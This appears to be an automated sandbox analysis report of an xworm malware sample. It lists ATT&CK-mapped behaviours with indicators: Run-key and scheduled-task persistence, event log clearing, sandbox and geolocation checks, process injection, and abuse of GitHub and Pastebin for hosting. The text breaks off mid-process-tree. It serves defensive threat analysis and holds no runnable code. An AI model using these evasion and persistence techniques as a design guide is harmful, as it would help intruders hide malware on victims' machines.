xworm | c5fcb6ebea1e21c19773e2735108228e8e81ed7387aa22d97235435a48a0c8fa

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	MasonRootkit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	WebThreatDefense (32 Bits).exe

Executes dropped EXE 4 IoCs

pid	Process
4784	WebThreatDefense (32 Bits).exe
4524	BootstrapperNew.exe
4260	MasonRootkit.exe
2708	MasonRootkit.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebThreatDefense (32 Bits) = "C:\\Users\\Admin\\AppData\\Roaming\\WebThreatDefense (32 Bits).exe"	WebThreatDefense (32 Bits).exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
12	raw.githubusercontent.com
18	pastebin.com
19	pastebin.com
39	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 4416	2708	MasonRootkit.exe	102

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File created	C:\Windows\WebThreatDefense (32 Bits).exe	BootstrapperNew.exe
File created	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1624	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184012963234A8 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000434c12d1fab3eb4695f545491a0a7d2800000000020000000000106600000001000020000000621a0f2f046d8fe47a341806f82ee8e873ac76c0764823ae40fc90cc4f54aa62000000000e8000000002000020000000a6a68e0d231ba6652e3aadf8ccdd40f418ab2801a1d4344f9b5c3ee28e8b9e14800000000f6ad20a09ffefe9fc80449a2735adcdea64b89ba3a5ba06052d2e3f535387836ccb21772606f6c7473e2edaf08edc75a377d196aba10cbadbe275cd675ea3130901bb714d51b32abfa3667f476c34fc34dacd4d63b552aa80d7b6b3c4139dab4056abd6aba79f9e124001dbd73163df4540467666c5c006d5587836d78a9cb040000000ae4693c08f5205194546400455d152d2dca1530d392c537710f02b58290946a54dd9a6b806c80d8336f7d6d9deb1230d8041f63e3070986dee3fe186c9a5dbcf	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000434c12d1fab3eb4695f545491a0a7d280000000002000000000010660000000100002000000001c5b661ae4d550fce66a3a76cbb47ed9ebd4626de28c117c81e47527cdbce66000000000e8000000002000020000000422153a03bdad1f7ca40a01aa2c7dd35c55345a82e7c8aefa6871973333652f410060000ccd943d503f9130536f7b28a7a3fa06d8fb896ecc65f3fce22d4df6098df7a00dd74a8c4d7693560c15313e38c09fd637c4ccea5967f3249323effa6dbc4e13399623a49120f3cddbb04cacd8e0ba05b78eb4a0387a87352af3ff1dbafa73774445062d0973f2e083da0c3b7eaac037b0b56dbf74be28fd3bfc97c6fb8809c2897b9f62e3ddb35110547a64114835c9edb7549474174c6326270349875811a75dbe9c94b885f63fda759145e7deeef25b3a7083fdab1efa3315f6758c015304010b6baeaa6e9c773d5d12f76cecac142f039f44b0d84cddd125403b11e118cedeb5493fc92728b831823b52765842526a9f22b0afbb1e367fa90fe580d24567d51e4338d1a64481ae72f233adba8e2398137514106c359c5020a70a2f7456203cedf429b9c30428cb3f22f606e895d750956c6e0e9d6951eef9222cb3281b75625cb4733a1fe2625f6821d7ad97ecfed309428dd6a1f2e1737b024cd04d7130d02c55d14e57065564b497e3528f9fcde37ab1f130349f50f65b252c49fd5d0904e5700a7e39450da1400c112fe17c45ba02b11c84cee74714ba248f4607b8c5d3f33f59eba23fe75ea025475b9cc0f5ae6657b22ba1e5c9026c7e482624d5a5dfc3f6ed58df8993284a47097883aa1bd350a1a5ed00a9a36d1d7f8b53f8b30e1360f03705d5981248489790716c4f507eaf63bdd9bdaffecf4a9373f7b78c018130eef1cba1eccbd864eef5174e01282a8f9d8da43fc28c2cf7fbfd2f926088757bf6f70c986233930f9a2a0abb20705d9803520dbe375af48fc8c28f5c143111c216177d9fa2cc29081015c7d568ddadb624e28ff54c1ebef0619ea6f66d484a6db7617c652921e6ca1319bf7c46a7c5a7bfec9f1a290c59e918e758784007e412bc6097bd6da8aa9d707ad210efe32387680b14aeeb27b19db7d8d3a9d0d9dec64dc0b5447ad68b85d350765730fdedd536cd6e38098bffae18118822943eed17ac56c6dc339e226ed0aee5bc01dabfd43b67d0d1662c1dc4de1a2e298215a419f414e001d27bd77e008d087e57360ffb24f39cd7779e91404faba6975d1f8af7de27506b006718660fe9340127acaa62ff4093a02d4c348204ee3be031812a9175ecd7e82460e68770b930788e4ca634612af5901714184c5647e4e771eaa5791580ded71f771985d32dc3cdaad12fbeffa512c5f376953f29c06b8244da85f6a2dc722d5b8e143d1e2787162aad3cd487ea96520380eb13898a07854005505eec527eed93f0245bcfb5ac1921e5ca76438e2fff5b96019c30f51d41a7b878fb9b65ba4e5a86192f871f724cac7ddb2f2e3a799f76e4399a036bbaeb8b2916e5575e1e169685717ba0edfd78176b9cb8eb6cd0256429b35f7236d57617dd16e430988cc2b51e826db668867b19a832a9d8bf840b54d1c7c35467d91d542878729fbfcbd2e21fd17810230f9181d7129c2573a6f6b0ec9a7a83d291c629085b9c97bf2c108a10b7e94c7fe2dbcdaac622708f3a0d1c2c8b75af706f55f376ca7e0ba181fb38b8e4060e12293438e9a14e1f7b5d9fed2c68c6caf6714dca1a1097bd9f6e937cab63cc755f13c4f7d08010ee2b2914be16f80a582b916240c714cf6f0766fc940860fe12280739bc456f49371d603edb38b83cd297e28d1729b0e1db4c84ef634c780d4fd3401399ab7981623ac46470b180d447acfc08ea8aa132a0058010954fa88ccf8671c1f6fd7c86cfc9fa92cc149ea7dad26fa8c1b756927662004092d8c030ba61afd183c58ced6f769feac684ba66fa126ed408b7f58a0f62a18712c9339f5566cf12c579914d5ca08fa02008c53c813af50a3690d024519b0747566f4019bf9f5f276f69b9c221788aa7564ba4ea2780d4ce63ea958546fac4dc45316adafbe529606cb6f48990ae97b2b67af71b11f10882d443009d88f0e4a4e077fe4ec998ee15a2235367a3d4e1b65d4a895d98b397546ede4f46de13f6a084a4f724f8e9eefe5de1a67b764468bddca8e6c04250ee52d210d71bd55265a252f29cbb7115d6f51a6ac34c1f55aa71292066935553e41470c2af15014f431368f62f04340d9912f3b82a4e8c63bdbab913d359624730783b7144bec881f38a159ab0eb78be61bbf35f01bb862d665a6681721220ccdfe1c69414b62e58ae616e970c9b9d737de3fa3fd400000001189042078fa6a670415bb1133bc1e44b2e40943587e788c989a5cdd2cd8de25967d9334619b2d5ad14111782e4fb78dc6ebffa0afe8000404c58b3267c0cb8a	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184012963234A8"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184012963234A8"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2468	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2548	powershell.exe
2548	powershell.exe
4728	powershell.exe
4728	powershell.exe
2708	MasonRootkit.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4180	wmiprvse.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4784	WebThreatDefense (32 Bits).exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4784	WebThreatDefense (32 Bits).exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4784	WebThreatDefense (32 Bits).exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe
4416	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3516	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	WebThreatDefense (32 Bits).exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	2708	MasonRootkit.exe
Token: SeDebugPrivilege	2708	MasonRootkit.exe
Token: SeDebugPrivilege	4416	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2160	svchost.exe
Token: SeIncreaseQuotaPrivilege	2160	svchost.exe
Token: SeSecurityPrivilege	2160	svchost.exe
Token: SeTakeOwnershipPrivilege	2160	svchost.exe
Token: SeLoadDriverPrivilege	2160	svchost.exe
Token: SeSystemtimePrivilege	2160	svchost.exe
Token: SeBackupPrivilege	2160	svchost.exe
Token: SeRestorePrivilege	2160	svchost.exe
Token: SeShutdownPrivilege	2160	svchost.exe
Token: SeSystemEnvironmentPrivilege	2160	svchost.exe
Token: SeUndockPrivilege	2160	svchost.exe
Token: SeManageVolumePrivilege	2160	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2160	svchost.exe
Token: SeIncreaseQuotaPrivilege	2160	svchost.exe
Token: SeSecurityPrivilege	2160	svchost.exe
Token: SeTakeOwnershipPrivilege	2160	svchost.exe
Token: SeLoadDriverPrivilege	2160	svchost.exe
Token: SeSystemtimePrivilege	2160	svchost.exe
Token: SeBackupPrivilege	2160	svchost.exe
Token: SeRestorePrivilege	2160	svchost.exe
Token: SeShutdownPrivilege	2160	svchost.exe
Token: SeSystemEnvironmentPrivilege	2160	svchost.exe
Token: SeUndockPrivilege	2160	svchost.exe
Token: SeManageVolumePrivilege	2160	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2160	svchost.exe
Token: SeIncreaseQuotaPrivilege	2160	svchost.exe
Token: SeSecurityPrivilege	2160	svchost.exe
Token: SeTakeOwnershipPrivilege	2160	svchost.exe
Token: SeLoadDriverPrivilege	2160	svchost.exe
Token: SeSystemtimePrivilege	2160	svchost.exe
Token: SeBackupPrivilege	2160	svchost.exe
Token: SeRestorePrivilege	2160	svchost.exe
Token: SeShutdownPrivilege	2160	svchost.exe
Token: SeSystemEnvironmentPrivilege	2160	svchost.exe
Token: SeUndockPrivilege	2160	svchost.exe
Token: SeManageVolumePrivilege	2160	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2160	svchost.exe
Token: SeIncreaseQuotaPrivilege	2160	svchost.exe
Token: SeSecurityPrivilege	2160	svchost.exe
Token: SeTakeOwnershipPrivilege	2160	svchost.exe
Token: SeLoadDriverPrivilege	2160	svchost.exe
Token: SeSystemtimePrivilege	2160	svchost.exe
Token: SeBackupPrivilege	2160	svchost.exe
Token: SeRestorePrivilege	2160	svchost.exe
Token: SeShutdownPrivilege	2160	svchost.exe
Token: SeSystemEnvironmentPrivilege	2160	svchost.exe
Token: SeUndockPrivilege	2160	svchost.exe
Token: SeManageVolumePrivilege	2160	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2160	svchost.exe
Token: SeIncreaseQuotaPrivilege	2160	svchost.exe
Token: SeSecurityPrivilege	2160	svchost.exe
Token: SeTakeOwnershipPrivilege	2160	svchost.exe
Token: SeLoadDriverPrivilege	2160	svchost.exe
Token: SeSystemtimePrivilege	2160	svchost.exe
Token: SeBackupPrivilege	2160	svchost.exe
Token: SeRestorePrivilege	2160	svchost.exe
Token: SeShutdownPrivilege	2160	svchost.exe
Token: SeSystemEnvironmentPrivilege	2160	svchost.exe

Suspicious use of FindShellTrayWindow 15 IoCs

pid	Process
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
3516	Explorer.EXE
3516	Explorer.EXE

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2284 wrote to memory of 2548	2284	BootstrapperNew.exe	86
PID 2284 wrote to memory of 2548	2284	BootstrapperNew.exe	86
PID 2284 wrote to memory of 2548	2284	BootstrapperNew.exe	86
PID 2284 wrote to memory of 4784	2284	BootstrapperNew.exe	88
PID 2284 wrote to memory of 4784	2284	BootstrapperNew.exe	88
PID 2284 wrote to memory of 4524	2284	BootstrapperNew.exe	89
PID 2284 wrote to memory of 4524	2284	BootstrapperNew.exe	89
PID 4784 wrote to memory of 4728	4784	WebThreatDefense (32 Bits).exe	91
PID 4784 wrote to memory of 4728	4784	WebThreatDefense (32 Bits).exe	91
PID 4728 wrote to memory of 4260	4728	powershell.exe	94
PID 4728 wrote to memory of 4260	4728	powershell.exe	94
PID 4784 wrote to memory of 2468	4784	WebThreatDefense (32 Bits).exe	95
PID 4784 wrote to memory of 2468	4784	WebThreatDefense (32 Bits).exe	95
PID 4260 wrote to memory of 2708	4260	MasonRootkit.exe	99
PID 4260 wrote to memory of 2708	4260	MasonRootkit.exe	99
PID 4260 wrote to memory of 1800	4260	MasonRootkit.exe	100
PID 4260 wrote to memory of 1800	4260	MasonRootkit.exe	100
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 2708 wrote to memory of 4416	2708	MasonRootkit.exe	102
PID 1800 wrote to memory of 1624	1800	cmd.exe	103
PID 1800 wrote to memory of 1624	1800	cmd.exe	103
PID 4416 wrote to memory of 616	4416	dllhost.exe	5
PID 4416 wrote to memory of 684	4416	dllhost.exe	7
PID 4416 wrote to memory of 956	4416	dllhost.exe	12
PID 4416 wrote to memory of 380	4416	dllhost.exe	13
PID 4416 wrote to memory of 520	4416	dllhost.exe	14
PID 4416 wrote to memory of 1004	4416	dllhost.exe	15
PID 684 wrote to memory of 2132	684	lsass.exe	39
PID 4416 wrote to memory of 1144	4416	dllhost.exe	17
PID 4416 wrote to memory of 1152	4416	dllhost.exe	18
PID 4416 wrote to memory of 1160	4416	dllhost.exe	19
PID 4416 wrote to memory of 1196	4416	dllhost.exe	20
PID 4416 wrote to memory of 1248	4416	dllhost.exe	21
PID 4416 wrote to memory of 1328	4416	dllhost.exe	22
PID 4416 wrote to memory of 1340	4416	dllhost.exe	23
PID 4416 wrote to memory of 1404	4416	dllhost.exe	24
PID 4416 wrote to memory of 1412	4416	dllhost.exe	25
PID 4416 wrote to memory of 1540	4416	dllhost.exe	26
PID 4416 wrote to memory of 1548	4416	dllhost.exe	27
PID 4416 wrote to memory of 1704	4416	dllhost.exe	28
PID 4416 wrote to memory of 1712	4416	dllhost.exe	29
PID 4416 wrote to memory of 1776	4416	dllhost.exe	30
PID 4416 wrote to memory of 1804	4416	dllhost.exe	31
PID 4416 wrote to memory of 1852	4416	dllhost.exe	32
PID 4416 wrote to memory of 1904	4416	dllhost.exe	33
PID 4416 wrote to memory of 1916	4416	dllhost.exe	34
PID 4416 wrote to memory of 1992	4416	dllhost.exe	35
PID 4416 wrote to memory of 2044	4416	dllhost.exe	36
PID 4416 wrote to memory of 2076	4416	dllhost.exe	37
PID 4416 wrote to memory of 2132	4416	dllhost.exe	39
PID 4416 wrote to memory of 2160	4416	dllhost.exe	40
PID 4416 wrote to memory of 2344	4416	dllhost.exe	41
PID 4416 wrote to memory of 2476	4416	dllhost.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:380
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1dcb2089-4d0c-4f25-ac3e-1501bcc410c0}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4416

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1160
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2764
- C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe
  "C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe"
  2⤵
  PID:5552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1412
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2820

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3032

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3516
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
